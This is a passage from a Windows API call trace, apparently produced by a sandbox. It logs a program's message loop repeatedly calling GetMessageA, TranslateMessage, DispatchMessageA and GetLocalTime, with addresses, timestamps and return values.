wSecond=0x31, wMilliseconds=0x35)) [0119.312] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.323] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.323] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.323] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x40)) [0119.323] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x40)) [0119.323] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.344] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.344] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.344] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x55)) [0119.344] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x55)) [0119.344] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.354] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.354] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.354] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x5f)) [0119.354] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x5f)) [0119.354] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.375] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.375] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.375] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x74)) [0119.375] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x74)) [0119.375] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.385] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.385] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.385] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x7e)) [0119.385] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x7e)) [0119.385] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.405] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.405] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.405] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x92)) [0119.405] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x92)) [0119.405] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.485] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.485] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.485] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0xe2)) [0119.485] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0xe2)) [0119.485] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.498] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.498] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.498] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0xef)) [0119.498] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0xef)) [0119.498] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.518] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.518] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.518] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x103)) [0119.518] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x103)) [0119.518] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.528] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.528] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.528] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x10d)) [0119.528] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x10d)) [0119.528] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.551] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.551] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.551] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x124)) [0119.552] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x125)) [0119.552] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.561] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.561] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.561] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x12e)) [0119.561] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x12e)) [0119.561] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.581] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.581] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.581] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x142)) [0119.581] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x142)) [0119.581] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.592] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.592] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.592] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x14d)) [0119.592] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x14d)) [0119.592] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.613] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.613] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.613] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x162)) [0119.613] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x162)) [0119.613] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.623] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.623] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.623] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x16c)) [0119.623] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x16c)) [0119.623] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.644] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.644] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.644] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x181)) [0119.644] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x181)) [0119.644] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.657] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.657] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.657] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x18e)) [0119.659] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x190)) [0119.659] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.667] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.667] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.667] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x198)) [0119.668] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x198)) [0119.668] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.688] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.688] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.688] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1ad)) [0119.688] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1ad)) [0119.689] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.701] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.701] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.701] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1ba)) [0119.701] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1ba)) [0119.701] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.719] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.719] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.719] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1cc)) [0119.719] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1cc)) [0119.719] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.729] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.729] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.729] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1d6)) [0119.729] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1d6)) [0119.730] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.750] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.750] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.750] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1eb)) [0119.751] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1ec)) [0119.751] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.760] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.760] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.760] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1f5)) [0119.760] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x1f5)) [0119.760] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.781] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.782] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.782] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x20b)) [0119.782] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x20b)) [0119.782] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.834] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.834] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.835] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x23f)) [0119.835] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x240)) [0119.835] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.843] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.843] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.843] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x248)) [0119.844] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x249)) [0119.845] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.854] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.854] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.854] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x253)) [0119.854] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x253)) [0119.854] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.876] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.876] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.876] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x269)) [0119.876] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x269)) [0119.876] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.886] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.886] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.886] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x273)) [0119.886] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x273)) [0119.886] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.909] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.909] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.909] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x28a)) [0119.909] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x28a)) [0119.909] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.918] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.918] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.918] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x293)) [0119.918] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x293)) [0119.919] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.940] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.940] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.940] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2a9)) [0119.940] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2a9)) [0119.940] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0119.950] TranslateMessage (lpMsg=0x2347a14) returned 0 [0119.950] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0119.950] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2b3)) [0119.950] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2b3)) [0119.950] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.002] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.002] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.002] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2e7)) [0120.002] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2e7)) [0120.002] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.004] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.004] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.004] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, 